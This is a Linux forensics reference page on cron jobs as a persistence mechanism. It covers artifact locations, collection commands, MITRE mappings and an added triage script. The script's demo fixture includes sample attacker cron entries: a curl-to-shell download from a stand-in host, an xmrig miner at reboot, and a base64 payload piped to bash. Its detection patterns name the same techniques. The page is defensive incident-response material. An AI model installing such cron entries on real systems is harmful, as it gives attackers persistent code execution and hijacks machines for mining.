Cron Jobs


Location

/etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/<user>

Description

Scheduled task definitions across system-wide crontab, the cron.d drop-in directory, and per-user crontabs. Each entry specifies a schedule, user context, and command to execute.

Forensic Value

Cron is the most common Linux persistence mechanism. Attacker cron entries typically download and execute payloads from external URLs, restart reverse shells at intervals, or run cryptominers. Checking /var/spool/cron/crontabs/ for all users reveals per-user entries that do not appear in the system-wide crontab. File modification timestamps on cron files help establish when persistence was installed.

Tools Required

cat, find, ls -la, crontab -l, aureport

Collection Commands

tar

tar czf /forensics/output/cron_all.tar.gz /etc/crontab /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ /var/spool/cron/

find

find /var/spool/cron/crontabs/ -type f -print -exec cat {} \; > /forensics/output/user_crontabs.txt

cat

cat /etc/crontab /etc/cron.d/* > /forensics/output/system_crontabs.txt

find

find /etc/cron.d /var/spool/cron -type f -newer /etc/os-release -ls > /forensics/output/recently_modified_cron.txt
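Once the files above are collected, the entry shapes called out under Forensic Value (download-and-execute, interval reverse shells, miners) can be triaged mechanically. The following is an added example, not part of the original page or any tool it names: a POSIX sh/awk function that parses a cron file, attributes each entry to a user, and tags suspicious patterns, with constructed sample files (hypothetical hosts and paths) so it runs offline.

```shell
#!/bin/sh
# Added example (not from the original page). Parses one cron file and prints
# file, user, schedule, command and flags for entries matching risky patterns.
# $1 = cron file; $2 = "system" (user field present: /etc/crontab, /etc/cron.d/*)
#                  or "user"   (per-user crontab; the owner is the file's basename)
triage_cron_file() {
  file=$1; kind=$2
  awk -v kind="$kind" -v owner="$(basename "$file")" -v file="$file" '
    /^[[:space:]]*(#|$)/ { next }                     # comments and blank lines
    /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # SHELL=, PATH=, MAILTO=
    {
      n = ($1 ~ /^@/) ? 1 : 5                         # @reboot-style vs five-field schedule
      sched = $1; for (i = 2; i <= n; i++) sched = sched " " $i
      if (kind == "system") { n++; user = $n } else { user = owner }
      cmd = ""; for (i = n + 1; i <= NF; i++) cmd = cmd (cmd == "" ? "" : " ") $i
      f = ""
      if (cmd ~ /(curl|wget)[^|;]*[|][[:space:]]*(ba)?sh([[:space:]]|$)/) f = f "pipe-to-shell,"
      if (cmd ~ /base64[[:space:]]+(-d|--decode)/) f = f "base64-decode,"
      if (cmd ~ /\/(tmp|var\/tmp|dev\/shm)\//) f = f "tmp-path,"
      if (cmd ~ /(xmrig|minerd|stratum[+]tcp)/) f = f "miner,"
      if (sched == "@reboot" || sched ~ /^\*\/[0-9]+ \* \* \* \*$/) f = f "frequent-or-reboot,"
      if (f != "") printf "%s\t%s\t%s\t%s\t%s\n", file, user, sched, cmd, f
    }' "$file"
}

# Constructed sample data (hypothetical hosts, not from any real system).
demo_triage() {
  d=$(mktemp -d); mkdir -p "$d/crontabs"
  cat > "$d/crontab" <<'EOF'
SHELL=/bin/sh
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root curl -fsSL http://example.invalid/a.sh | sh
@reboot root /var/tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333
EOF
  cat > "$d/crontabs/www-data" <<'EOF'
15 * * * * /usr/bin/php /var/www/cron.php
0 3 * * * echo aGVsbG8= | base64 -d | bash
EOF
  triage_cron_file "$d/crontab" system          # flags two of three entries
  triage_cron_file "$d/crontabs/www-data" user  # flags the base64 entry only
  rm -rf "$d"
}
```

Run it against the collected copies (for example `triage_cron_file /forensics/output/cron_all/etc/crontab system`) rather than the live host; the flags are triage hints, and an unflagged entry still deserves a read.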

Collection Constraints

  • Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.

MITRE ATT&CK Techniques

T1053.003, T1053, T1059.004

Related Blockers

Attack Delivered via Legitimately Signed Update

The malicious artifact carries a valid signature from the vendor's real signing key, so traditional allow-by-signature controls (Authenticode policy, Cosign verification, macOS notarization) do not flag it. Detection must pivot to behavioral indicators, reputation, and anomaly-based signals.

Mining Incident Treated as Low Priority by Stakeholders

Stakeholders frame unauthorized mining as "just a resource cost" and push for immediate process-kill and closure rather than a full investigation. This under-scoping routinely leaves the entry vector open and misses secondary compromise (webshells, backdoors, credential theft) the attacker installed alongside the miner.

Fileless Malware With Minimal On-Disk Footprint

The suspected malware runs primarily in memory with minimal or no on-disk persistence. Traditional file-hash IoC hunts return empty, and disk-image analysis misses the active payload. Response must pivot to memory forensics, ETW, PowerShell script-block logging, and AMSI telemetry.

Attacker Living Off the Land with Native Binaries

The attacker relies on legitimate system binaries (PowerShell, certutil, bitsadmin, regsvr32, rundll32, mshta, wmic) for execution and lateral movement. File-reputation and signature-based detection fails because the binaries are legitimate; detection must shift to behavioral anomaly, parent-child process analysis, and command-line context.

Deep Anti-Forensics: Timestomping, Rootkits, Secure Delete

The attacker has employed anti-forensic techniques: timestomping ($MFT/$STANDARD_INFORMATION manipulation), log clearing (Security.evtx wiped, journalctl truncated), NTFS alternate data stream hiding, rootkits, file-attribute masking, or secure-delete of specific indicators. Standard forensic analysis produces incomplete or misleading results.